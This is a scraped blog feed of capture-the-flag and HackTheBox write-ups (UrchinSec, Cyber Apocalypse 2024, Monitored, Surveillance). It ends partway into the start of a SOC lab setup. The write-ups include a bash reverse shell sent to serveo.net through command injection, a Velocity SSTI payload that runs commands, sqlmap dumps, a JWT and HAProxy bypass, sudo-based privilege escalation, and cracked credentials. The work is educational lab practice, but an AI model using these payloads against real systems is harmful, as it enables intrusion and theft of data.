HttpOnly; SameSite=Lax | Set-Cookie: _csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:13 GMT | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en-US\u0026#34; data-theme=\u0026#34;gitea-auto\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta name=\u0026#34;viewport\u0026#34; content=\u0026#34;width=device-width, initial-scale=1\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Gitea: Git with a cup of tea\u0026lt;/title\u0026gt; | \u0026lt;link rel=\u0026#34;manifest\u0026#34; href=\u0026#34;data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6ImltYWdlL3BuZyIsInNpem | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Allow: HEAD | Allow: GET | Cache-Control: max-age=0, private, must-revalidate, no-transform | Set-Cookie: i_like_gitea=e41496a78b8b88ad; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxNDIyMDEyMDUyMzg0MjU2Mw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:20 GMT |_ Content-Length: 0 3306/tcp open mysql MariaDB (unauthorized) 3333/tcp open nagios-nsca Nagios NSCA 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC50%P=x86_64-pc-linux-gnu%r(G SF:etRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202 SF:024\\x2012:15:12\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(HTTPOptions, SF:4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012: SF:15:13\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPRequest,67,\u0026#34;HTTP/1 SF:\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset SF:=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(FourOhF SF:ourRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x20 SF:2024\\x2012:15:19\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(GenericLine SF:s,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain SF:;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request SF:\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20te SF:xt/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x2 SF:0Request\u0026#34;)%r(SSLSessionReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCo SF:ntent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n SF:\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TerminalServerCookie,67,\u0026#34;HTTP/1\\.1\\x20400 SF:\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\n SF:Connection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TLSSessionReq,67, SF:\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20 SF:charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r( SF:Kerberos,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20tex SF:t/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20 SF:Request\u0026#34;)%r(LPDString,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent SF:-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n4 SF:00\\x20Bad\\x20Request\u0026#34;)%r(LDAPSearchReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20R SF:equest\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\ SF:x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(SIPOptions,67,\u0026#34;HTTP/1\\.1\\x204 SF:00\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r SF:\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port3000-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC51%P=x86_64-pc-linux-gnu%r SF:(GenericLines,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x SF:20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba SF:d\\x20Request\u0026#34;)%r(GetRequest,38A1,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nCache-Contr SF:ol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nCo SF:ntent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nSet-Cookie:\\x20i_like_git SF:ea=7748aed9b1afa3fe;\\x20Path=/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Coo SF:kie:\\x20_csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw;\\x SF:20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Opt SF:ions:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012:15:13\\x SF:20GMT\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en-US\\\u0026#34;\\x20data-theme= SF:\\\u0026#34;gitea-auto\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\\t\u0026lt;meta\\x20name=\\\u0026#34;viewport\\\u0026#34;\\x20content=\\\u0026#34;widt SF:h=device-width,\\x20initial-scale=1\\\u0026#34;\u0026gt;\\n\\t\u0026lt;title\u0026gt;Gitea:\\x20Git\\x20with\\x SF:20a\\x20cup\\x20of\\x20tea\u0026lt;/title\u0026gt;\\n\\t\u0026lt;link\\x20rel=\\\u0026#34;manifest\\\u0026#34;\\x20href=\\\u0026#34; SF:data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG SF:9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic SF:3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoi SF:aHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6Iml SF:tYWdlL3BuZyIsInNpem\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n SF:Content-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r SF:\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(HTTPOptions,197,\u0026#34;HTTP/1\\.0\\x20405\\x20Me SF:thod\\x20Not\\x20Allowed\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x20GET\\r\\nCache-Cont SF:rol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nS SF:et-Cookie:\\x20i_like_gitea=e41496a78b8b88ad;\\x20Path=/;\\x20HttpOnly;\\x2 SF:0SameSite=Lax\\r\\nSet-Cookie:\\x20_csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxN SF:DIyMDEyMDUyMzg0MjU2Mw;\\x20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20Sam SF:eSite=Lax\\r\\nX-Frame-Options:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20A SF:pr\\x202024\\x2012:15:20\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPR SF:equest,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/ SF:plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Re SF:quest\u0026#34;); Only ports of interest were 22, 25 , 80 , 3306\non port 80 is bills portfolio other than that there is nothing interesting\nso we try and get the subdomains:\nThere are two subdomains :\ngit.billsys.urc - this is running a local instance of gittea storage.billsys.urc - this is running am instance of tiny file manager On git.billsys.urc we create an account and login. There are other users and repos but the one that sticks out is that of bill.\nIt is source code for a python web app called sesame.\nLooking at the commits we see a sqllite instance database that had been ommited we download it and view contents\ncracking the user hash we get the password\n1 ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f : password123 On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. *\n1 admin : admin@123 Here we can upload files , so i upload a php rev shell\nDropping to the shell we see that we are user \u0026ldquo;http\u0026rdquo;. There is no obvious method of priv esc.\nI was stuck here till i checked the open ports on the machine using netstat.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 38132/python3 tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp6 0 0 :::5355 :::* LISTEN - tcp6 0 0 :::3306 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::3000 :::* LISTEN - tcp6 0 0 :::3333 :::* LISTEN - As you see above there is a service on port 80 that is only accessed internally.\nTo access this from our attack box we will need to use a tunnel client like chisel. You can get chisel \u0026raquo; here\n1 2 on attackbox \u0026gt;\u0026gt; ./chisel server -p 8000 --reverse on chal machine \u0026gt;\u0026gt; ./chisel client \u0026lt;ip\u0026gt;:8000 R:8001:127.0.0.1:8080 After this we can access the service on port 80 which is the sesame application we got the src earlier.\nOn the sesame applicatiion we login with the creds we found in the sqlite db file.\nIf you read the src this application is used by bill to read files in the server.\nThere is nothing else interesting so i looked through the source code.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 in main.py def dashboard(): if request.method == \u0026#34;GET\u0026#34;: return render_template(\u0026#39;dash.html\u0026#39;) if request.method == \u0026#34;POST\u0026#34;: key = request.form.get(\u0026#34;key\u0026#34;) file_read = request.form.get(\u0026#34;fileread\u0026#34;) check_key = SesameKey.query.filter_by(key=key).first() if check_key is not None: num = 107 stk = chr(num) secret = \u0026#39;\u0026#39;.join([chr(ord(x) ^ ord(stk)) for x in key]) with open(\u0026#34;temp_secret\u0026#34;, \u0026#34;w\u0026#34;) as temp: temp.write(secret) command = f\u0026#34;sudo sesame -i temp_secret -r {file_read}\u0026#34; run = subprocess.check_output(command, shell=True) run = run.decode(\u0026#39;utf-8\u0026#39;) os.system(f\u0026#34;rm -rf temp_secret\u0026#34;) return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;It Works\u0026#34;) else: return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;Wrong Key\u0026#34;) If you look carefully our user input is not being sanitized and it is being put directly to subprocess module. Seeing this you immediately think command execution.\nThe catch is that the output of a command you run will not be displayed.\nSo after some trial i created:\n1 key=IpwnEazy@@#TH!ngG5~\u0026amp;fileread=/etc/passwd; bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/serveo.net/33997 0\u0026gt;\u0026amp;1\u0026#34;\u0026amp;action= This gets us a reverse shell. We are now the user bill. From here i created ssh keys so that i could login via ssh which is better and more stable.\nOur target now us to achieve root.\nRunning sudo -l we can see that our user can run \u0026ldquo;sesame\u0026rdquo; command with sudo rights.\nThis command is used earlier in the python application\n1 2 3 Running : sudo sesame -i temp_secret -r /etc/shadow Note: shadow file is only read by root so with this command we can read files as the root user. 1 2 3 4 5 6 7 8 9 Error: -i is a required argument Usage of sesame: -h\tPrints This Output -i string Input Secret File To Read Secret (-i /path/to/secret.txt) -r string File To Read (-r /path/to/filetoread.txt) -s\tChange Permissions Of Files It also supports changing of file permissions with -s flag.\nSO in order to read the root flag we can exploit this. So after some trial and error i did this\n1 2 3 4 5 6 7 8 9 10 11 12 sudo sesame -i temp_secret -s When it prompts for a file enter ../../../../../../root/. When it prompts for permission 777 This above will make the root permission be rwx by everyone.\n1 . (dot): This refers to the current directory. For example, if you\u0026#39;re in the directory /home/user, then . refers to /home/user. From here you can read the root flag\nflag : urchinsec{I_know_CTF_This_S3rV35_IS_we334akK_NEXTTTT}\n","date":"2024-04-28T18:07:14+03:00","image":"https://f0rk3b0mb.github.io/cover/urchinsec.png","permalink":"https://f0rk3b0mb.github.io/p/urchinsec_2024/","title":"Urchinsec_2024"},{"content":"This is the writeup of HTB cyber apocalypse 2024 web challenges.\nI participated with my team \u0026ldquo;Gang de la Sinfonia\u0026rdquo;.\nWeb Category TimeKORP rating: very easy\nHere you are provided with a webpage that has a parameter ?format=%H:%M:%D , from the source code it was running linux date command from that syntax.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 \u0026lt;?php class TimeModel { public function __construct($format) { $this-\u0026gt;command = \u0026#34;date \u0026#39;+\u0026#34; . $format . \u0026#34;\u0026#39; 2\u0026gt;\u0026amp;1\u0026#34;; } public function getTime() { $time = exec($this-\u0026gt;command); $res = isset($time) ? $time : \u0026#39;?\u0026#39;; return $res; } } This is classic command injection.\n1 payload : %H:%M:%D\u0026#39;;cat flag.txt flag: HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}\nKORP terminal rating: very easy\nFor this challnge you are provided with a login page that requires a username and password. So it has to be login bypass.\nGiven the rating of this challenge just throw sqlmap at it. You can also confirm this by using a single quote ,it return a sql error.\nOutput from slqmap\nFrom this we get a user admin and the password hash.\n1 admin: $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. 1 2 3 hashcat -m 3200 hashcat.txt /usr/share/wordlists/rockyou.txt $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123 Cracking the password using hashcat we get the password : password123\nWe can then login to get the flag\nflag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}\nFlag command rating: very easy\nHere we are given an applicating that requires a bunch of commands to navigate a puzzle. When you intercept the traffic using burp you will see an endpoint with a list of the commands.\nHere we can see a secret command. Using it\u0026hellip;\nflag: HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}\nLabrinth Linguist rating: easy\nHere we are given a webapp that translates text that we give it.\nOooooh its a java application. I wasnt expecting thsi to be straight forward. But \u0026hellip;\n1 2 3 4 5 6 7 String template = \u0026#34;\u0026#34;; try { template = readFileToString(\u0026#34;/app/src/main/resources/templates/index.html\u0026#34;, textString); } catch (IOException e) { e.printStackTrace(); } Our input was being used in a template. This is dangerous if no filters are applied. I quickly googled SSTI in java (Server Side Template Injection) payloads. Got this \u0026raquo; here .\nFrom here we can execute commands and cat the flag. Credits to Anshul for doing this. I had a problem using the payload in burp suite due to the newlines.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 #set($s=\u0026#34;\u0026#34;) #set($stringClass=$s.getClass()) #set($stringBuilderClass=$stringClass.forName(\u0026#34;java.lang.StringBuilder\u0026#34;)) #set($inputStreamClass=$stringClass.forName(\u0026#34;java.io.InputStream\u0026#34;)) #set($readerClass=$stringClass.forName(\u0026#34;java.io.Reader\u0026#34;)) #set($inputStreamReaderClass=$stringClass.forName(\u0026#34;java.io.InputStreamReader\u0026#34;)) #set($bufferedReaderClass=$stringClass.forName(\u0026#34;java.io.BufferedReader\u0026#34;)) #set($collectorsClass=$stringClass.forName(\u0026#34;java.util.stream.Collectors\u0026#34;)) #set($systemClass=$stringClass.forName(\u0026#34;java.lang.System\u0026#34;)) #set($stringBuilderConstructor=$stringBuilderClass.getConstructor()) #set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass)) #set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass)) #set($runtime=$stringClass.forName(\u0026#34;java.lang.Runtime\u0026#34;).getRuntime()) #set($process=$runtime.exec(\u0026#34;cat ../flag2023911480.txt\u0026#34;)) #set($null=$process.waitFor() ) #set($inputStream=$process.getInputStream()) #set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream)) #set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader)) #set($stringBuilder=$stringBuilderConstructor.newInstance()) #set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator()))) $output Just use the payload in the browser and capture the request in burp.\nflag : HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}\nLocktalk rating: medium\nThis is where things got interesting.\nHere you are given a webapplication with an api blueprint.\nThe api had three routes:\n1 2 3 4 5 /flag protected by middleware /chat/\u0026lt;int:chat_id\u0026gt; protected by middleware /get_ticket open but blocked by ha proxy A quick look at the proxy configuration\n1 2 3 4 5 frontend haproxy bind 0.0.0.0:1337 default_backend backend http-request deny if { path_beg,url_dec -i /api/v1/get_ticket } So we had to find a way to bypass this. I used a lot of time on this part. Until i found this \u0026raquo; here\nTo make your search easier you had to find the ha proxy version from the dockerfile : PS i had forgotten do thsi , it could have made my work easier.\n1 2 3 4 5 6 WORKDIR /tmp RUN wget https://www.haproxy.org/download/2.8/src/haproxy-2.8.1.tar.gz \u0026amp;\u0026amp; \\ tar zxvf haproxy-*.tar.gz \u0026amp;\u0026amp; cd haproxy-* \u0026amp;\u0026amp; \\ make TARGET=linux-musl \u0026amp;\u0026amp; \\ make install RUN rm -rf * From the article if we make a request to /api/v1/get_ticket we get denied but if we make request to /api/v1/get_ticket# we bypass the acl.\nFrom here i gotr the jwt token. I tries common methos of exploiting jwt but none of them worked. UNtil i searched for a vulnerability in python_jwt==3.3.3 from the requirements.txt\nI found this vulnerability that enables us to bypass the jwt verification \u0026raquo; here and for the exploit \u0026raquo; here\nWe change our role to administrator and then read the flag\nflag: HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}\nTestimonial Here we are given a webapplication that accepts parameters customer and testimonial.\nIt is a go webapplication witha grpc endpoint. I saw some people asking on the discord why there were two ip addresses. One if for the main webapp and one was for grpc. Read more about grpc \u0026raquo; here\nIve encountered with grpc before. So the tools we will need are grpcurl and grpcui. In this context grpcui will not work.\n1 grpcurl -plaintext -import-path ./ -proto ptypes.proto -d \u0026#39;{\u0026#34;customer\u0026#34;: \u0026#34;examplecusomer\u0026#34;, \u0026#34;testimonial\u0026#34;: \u0026#34;exampletestimonial\u0026#34;}\u0026#39; 94.237.59.119:45387 RickyService.SubmitTestimonial Above is the format for grpcurl. Breakdown:\nptypes.proto file is in the pb folder . This is used to enable grpcurl to interact with the server since service enumaration was disables . This is what caused grpcui not to work.\nThe service and method name can be found in the source code.\nUsing this will also enable you to bypass the filter that was placed in the code\n1 2 3 for _, char := range []string{\u0026#34;/\u0026#34;, \u0026#34;\\\\\u0026#34;, \u0026#34;:\u0026#34;, \u0026#34;*\u0026#34;, \u0026#34;?\u0026#34;, \u0026#34;\\\u0026#34;\u0026#34;, \u0026#34;\u0026lt;\u0026#34;, \u0026#34;\u0026gt;\u0026#34;, \u0026#34;|\u0026#34;, \u0026#34;.\u0026#34;} { customer = strings.ReplaceAll(customer, char, \u0026#34;\u0026#34;) } NOTE: Beyond this point i did after the ctf , i did not solve this one.\nOfficial writeup \u0026raquo; https://github.com/hackthebox/cyber-apocalypse-2024/tree/main/web/%5BEasy%5D%20Testimonial\n","date":"2024-03-11T13:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/ca2024.png","permalink":"https://f0rk3b0mb.github.io/p/htb_cyberapocalypse_2024/","title":"HTB_cyberapocalypse_2024"},{"content":"HTB monitored Writeup for HTB monitored box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 08:28 EAT Warning: 10.10.11.248 giving up on port because retransmission cap hit (6). Nmap scan report for monitored.htb (10.10.11.248) Host is up (0.36s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc 123/udp open ntp NTP v4 (unsynchronized) | ntp-info: |_ 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 6f3fa7421af94c6500000000 | snmpEngineBoots: 35 |_ snmpEngineTime: 48m05s | snmp-netstat: | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 0.0.0.0:389 0.0.0.0:0 | TCP 127.0.0.1:25 0.0.0.0:0 |_ UDP 0.0.0.0:68 *:* | snmp-processes: | 1: | | 2: | |_ 3: | snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64 |_ System uptime: 48m5.77s (288577 timeticks) |_snmp-win32-software: 162/udp open snmp net-snmp; net-snmp SNMPv3 server | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 5a44ab2146ff4c6500000000 | snmpEngineBoots: 26 |_ snmpEngineTime: 48m05s 1100/udp open|filtered mctp 1813/udp open|filtered radacct 3130/udp open|filtered squid-ipc 19500/udp open|filtered unknown 22053/udp open|filtered unknown 27444/udp open|filtered Trinoo_Bcast 44190/udp open|filtered unknown 49259/udp open|filtered unknown Service Info: Host: monitored Host script results: |_clock-skew: 10s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1302.38 seconds Snmp enumeration\n1 snmpwalk -v1 -c public monitored.htb we get creds for username: svc pass: XjH7VCehowpR1xZB\nMaking a post request to /api/v1/authenticate we get access token that we can use to login\n1 2 https://nagios.monitored.htb/nagiosxi/index.php?token=1562fdd66ece5a71f970399218ab842b6c8674c0 this nagios is vulnerable to sql injection \u0026raquo; see here\n1 sqlmap -u \u0026#34;https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php\u0026#34; --data=\u0026#34;id=3\u0026amp;action=acknowledge_banner_message\u0026#34; --cookie \u0026#34;nagiosxi=40ka0uvgngmjev8i267hq2qt9p\u0026#34; --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump Dumping the db enables us to get an admin api key : IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\nWe can now create our owm user with full privilldeges\n1 curl -XPOST -k \u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=test\u0026amp;password=test\u0026amp;name=test\u0026amp;email=test@test.com\u0026amp;auth_level=admin\u0026#34; Uploads a reverse shell by creating a command and checking it\nuser.txt 5428c0b228e51f2428525f3faa3fcca2\nTo escalate privilldges we modify the setuid binary npcd\nroot.txt 9893d1d8c72bc11111a49fcb508ac07a\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_monitored/","title":"Htb_monitored"},{"content":"HTB surveillance Writeup for htb surveillnace box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:38 EAT Nmap scan report for 10.10.11.245 Host is up (0.30s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds A cms is running in port 80 , craft cms\nIt is vulnerable to rce CVE-2023-41892\nThere are 2 :\nmatthew zoneminder Further enumartion we get a backup file surveillance\u0026ndash;2023-10-17-202801\u0026ndash;v4.4.14.sql.zip. It has a sql backup of the database , here we get creds for the user matthew.\nuser.txt 260ecc03cedb8e78d80a6658b5b22eac\nWe also get the creda for zoneminder in the ZoneMinder config files password : ZoneMinderPassword2023\nZoneminder is a service running on port 8080, So we tunnel using ssh to access it.\nIt is vulnerable to rce CVE-2023-26035\nTo escalate priviledges and read root flag\n1 sudo /usr/bin/zmupdate.pl -v 1.19.0 -u \u0026#34;;cat /root/root.txt;\u0026#34; root.txt 13630834b0c9c6f122557097788d8e25\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_surveillance/","title":"Htb_surveillance"},{"content":"SOC Lab Setup Introduction This is my documentation of a lab setup for a SOC (Security operation center) environment. I decided to pursue this project with the aim of learning about endpoint detection and response. SOC analysis is more about blue teaming and detecting threats in an environment.\nAs is did this i followed steps from this blog post \u0026raquo; here . Credits!!\nSummary Setup Intrusion Blocking attacks Tuning False Positives Setup Setup of vms(ubuntu server and windows) NOTE: im using a computer with the following specs:\n8gb RAM intel i5 500gb hard disk You might want to allocate different amount of resources for your vms depending on the specs of your hardware. As for me my specs constrained me , my vms were slow esp the windows vm. I allocated 2gb for the windows vm and 1gb for the ubuntu server.\nInstalling of limacharlie sensor LimaCharlie is a very powerful “SecOps Cloud Platform” . Check it out \u0026raquo; here\nC2 (command and control) For the C2 i used sliver-server by bishop fox\n1 Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing I created a C2 payload and dropped it in the windows vm.\nUsing the implant we can access the windows vm from the ubuntu server attack machine.\nBelow is a list of running processes\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 . ├── [0] [System Process] │ └── [4] System │ ├── [1444] Memory Compression │ ├── [72] Registry │ └── [528] smss.exe ├── [632] csrss.exe ├── [732] csrss.exe ├── [776] wininit.exe │ ├── [864] services.exe │ │ ├── [2160] Sysmon64.exe │ │ ├── [3708] svchost.exe │ │ ├── [1348] svchost.exe │ │ ├── [1508] svchost.exe │ │ ├── [1668] svchost.exe │ │ │ └── [5768] audiodg.exe │ │ ├── [2152] vm3dservice.exe │ │ │ └── [2284] vm3dservice.exe │ │ ├── [1128] svchost.exe │ │ │ ├── [648] taskhostw.exe │ │ │ ├── [1960] sihost.exe │ │ │ ├── [2436] CompatTelRunner.exe │ │ │ │ ├── [2488] conhost.exe │ │ │ │ └── [1236] CompatTelRunner.exe │ │ │ ├── [2520] MicrosoftEdgeUpdate.exe │ │ │ └── [3460] taskhostw.exe │ │ ├── [2124] vmtoolsd.exe │ │ ├── [4368] svchost.exe │ │ ├── [3500] SecurityHealthService.exe │ │ ├── [6548] svchost.exe │ │ ├── [1636] svchost.exe │ │ ├── [1772] svchost.exe │ │ ├── [1788] svchost.exe │ │ ├── [3100] SgrmBroker.exe │ │ ├── [1304] svchost.exe │ │ ├── [2168] VGAuthService.exe │ │ ├── [2132] rphcp.exe │ │ ├── [628] svchost.exe │ │ ├── [896] spoolsv.exe │ │ ├── 